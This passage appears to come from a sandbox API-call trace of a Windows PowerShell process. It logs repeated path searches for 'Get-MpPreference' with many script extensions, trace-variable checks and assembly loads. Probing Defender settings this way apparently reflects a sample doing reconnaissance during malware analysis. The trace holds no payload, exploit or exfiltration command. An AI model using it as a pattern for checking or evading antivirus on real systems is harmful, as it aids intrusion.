ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.270] GetLastError () returned 0x2 [0052.270] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.270] GetLastError () returned 0x2 [0052.270] SetErrorMode (uMode=0x1) returned 0x1 [0052.270] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.JSE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.271] GetLastError () returned 0x2 [0052.271] SetErrorMode (uMode=0x1) returned 0x1 [0052.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.271] GetLastError () returned 0x2 [0052.271] SetErrorMode (uMode=0x1) returned 0x1 [0052.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.WSF", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.271] GetLastError () returned 0x2 [0052.271] SetErrorMode (uMode=0x1) returned 0x1 [0052.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.271] GetLastError () returned 0x2 [0052.271] SetErrorMode (uMode=0x1) returned 0x1 [0052.271] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.WSH", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.271] GetLastError () returned 0x2 [0052.271] SetErrorMode (uMode=0x1) returned 0x1 [0052.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.272] GetLastError () returned 0x2 [0052.272] SetErrorMode (uMode=0x1) returned 0x1 [0052.272] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference.MSC", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.272] GetLastError () returned 0x2 [0052.272] SetErrorMode (uMode=0x1) returned 0x1 [0052.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0052.272] GetLastError () returned 0x2 [0052.272] SetErrorMode (uMode=0x1) returned 0x1 [0052.272] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Get-MpPreference", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.273] GetLastError () returned 0x2 [0052.273] SetErrorMode (uMode=0x1) returned 0x1 [0052.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.273] GetLastError () returned 0x2 [0052.273] SetErrorMode (uMode=0x1) returned 0x1 [0052.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.ps1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.273] GetLastError () returned 0x2 [0052.273] SetErrorMode (uMode=0x1) returned 0x1 [0052.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.273] GetLastError () returned 0x2 [0052.273] SetErrorMode (uMode=0x1) returned 0x1 [0052.273] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.psm1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.273] GetLastError () returned 0x2 [0052.273] SetErrorMode (uMode=0x1) returned 0x1 [0052.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.274] GetLastError () returned 0x2 [0052.274] SetErrorMode (uMode=0x1) returned 0x1 [0052.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.psd1", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.274] GetLastError () returned 0x2 [0052.274] SetErrorMode (uMode=0x1) returned 0x1 [0052.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.274] GetLastError () returned 0x2 [0052.274] SetErrorMode (uMode=0x1) returned 0x1 [0052.274] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.COM", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.274] GetLastError () returned 0x2 [0052.274] SetErrorMode (uMode=0x1) returned 0x1 [0052.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.274] GetLastError () returned 0x2 [0052.274] SetErrorMode (uMode=0x1) returned 0x1 [0052.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.EXE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.275] GetLastError () returned 0x2 [0052.275] SetErrorMode (uMode=0x1) returned 0x1 [0052.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.275] GetLastError () returned 0x2 [0052.275] SetErrorMode (uMode=0x1) returned 0x1 [0052.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.BAT", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.275] GetLastError () returned 0x2 [0052.275] SetErrorMode (uMode=0x1) returned 0x1 [0052.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.275] GetLastError () returned 0x2 [0052.275] SetErrorMode (uMode=0x1) returned 0x1 [0052.275] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.CMD", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.276] GetLastError () returned 0x2 [0052.276] SetErrorMode (uMode=0x1) returned 0x1 [0052.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.276] GetLastError () returned 0x2 [0052.276] SetErrorMode (uMode=0x1) returned 0x1 [0052.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.VBS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.276] GetLastError () returned 0x2 [0052.276] SetErrorMode (uMode=0x1) returned 0x1 [0052.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.276] GetLastError () returned 0x2 [0052.276] SetErrorMode (uMode=0x1) returned 0x1 [0052.276] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.VBE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.276] GetLastError () returned 0x2 [0052.276] SetErrorMode (uMode=0x1) returned 0x1 [0052.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.277] GetLastError () returned 0x2 [0052.277] SetErrorMode (uMode=0x1) returned 0x1 [0052.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.JS", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.277] GetLastError () returned 0x2 [0052.277] SetErrorMode (uMode=0x1) returned 0x1 [0052.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.277] GetLastError () returned 0x2 [0052.277] SetErrorMode (uMode=0x1) returned 0x1 [0052.277] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.JSE", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.277] GetLastError () returned 0x2 [0052.277] SetErrorMode (uMode=0x1) returned 0x1 [0052.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.277] GetLastError () returned 0x2 [0052.277] SetErrorMode (uMode=0x1) returned 0x1 [0052.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.WSF", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.278] GetLastError () returned 0x2 [0052.278] SetErrorMode (uMode=0x1) returned 0x1 [0052.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.278] GetLastError () returned 0x2 [0052.278] SetErrorMode (uMode=0x1) returned 0x1 [0052.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.WSH", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.278] GetLastError () returned 0x2 [0052.278] SetErrorMode (uMode=0x1) returned 0x1 [0052.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.278] GetLastError () returned 0x2 [0052.278] SetErrorMode (uMode=0x1) returned 0x1 [0052.278] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference.MSC", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.278] GetLastError () returned 0x2 [0052.279] SetErrorMode (uMode=0x1) returned 0x1 [0052.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5c8e8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0052.279] GetLastError () returned 0x2 [0052.279] SetErrorMode (uMode=0x1) returned 0x1 [0052.279] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Get-MpPreference", lpFindFileData=0x287620 | out: lpFindFileData=0x287620*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0052.279] GetLastError () returned 0x2 [0052.279] SetErrorMode (uMode=0x1) returned 0x1 [0052.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.640] GetLastError () returned 0xcb [0052.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8e92c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.642] GetLastError () returned 0x2 [0052.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8e8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.642] GetLastError () returned 0x2 [0052.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8e8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.642] GetLastError () returned 0x2 [0052.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8e8dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0052.642] GetLastError () returned 0x2 [0052.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.729] GetLastError () returned 0xcb [0052.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.939] GetLastError () returned 0xcb [0052.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.943] GetLastError () returned 0xcb [0052.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.976] GetLastError () returned 0xcb [0052.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.981] GetLastError () returned 0xcb [0052.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.982] GetLastError () returned 0xcb [0052.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0052.998] GetLastError () returned 0xcb [0053.040] VirtualQuery (in: lpAddress=0x5c8d92c, lpBuffer=0x5c8e92c, dwLength=0x1c | out: lpBuffer=0x5c8e92c*(BaseAddress=0x5c8d000, AllocationBase=0x5300000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x286480, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.097] GetLastError () returned 0xcb [0053.171] VirtualQuery (in: lpAddress=0x5c8d92c, lpBuffer=0x5c8e92c, dwLength=0x1c | out: lpBuffer=0x5c8e92c*(BaseAddress=0x5c8d000, AllocationBase=0x5300000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.178] GetLastError () returned 0xcb [0053.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.178] GetLastError () returned 0xcb [0053.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.178] GetLastError () returned 0xcb [0053.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.178] GetLastError () returned 0xcb [0053.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.200] GetLastError () returned 0xcb [0053.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5c8df10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.200] GetLastError () returned 0xcb [0053.200] GetFullPathNameW (in: 